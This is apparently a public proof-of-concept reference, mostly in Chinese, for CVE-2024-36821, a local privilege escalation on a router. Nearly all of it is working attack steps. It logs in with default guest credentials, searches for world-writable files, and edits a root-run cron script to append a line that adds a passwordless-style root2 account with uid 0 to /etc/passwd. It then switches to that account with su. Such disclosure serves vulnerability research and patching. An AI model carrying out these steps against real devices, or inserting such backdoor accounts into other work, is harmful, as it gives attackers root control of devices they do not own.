
The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821
包含CVE-2024-36821漏洞所需最低限度信息的公开参考
通过UART连接连接到路由器
使用 guest:guest 凭据登录系统
使用 find / -perm -777 -type f 2>/dev/null 命令查找具有读-写-执行权限的文件:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
通过 ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh 命令检查所有者
通过 openssl passwd Abracadabra 命令生成密码
编辑 /tmp/cron/cron.everyminute/conntrack_collector.sh,在末尾添加新生成的密码:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
等待一分钟
通过以下命令切换用户至 root2
/ $ su root2
Password: Abracadabra
~ #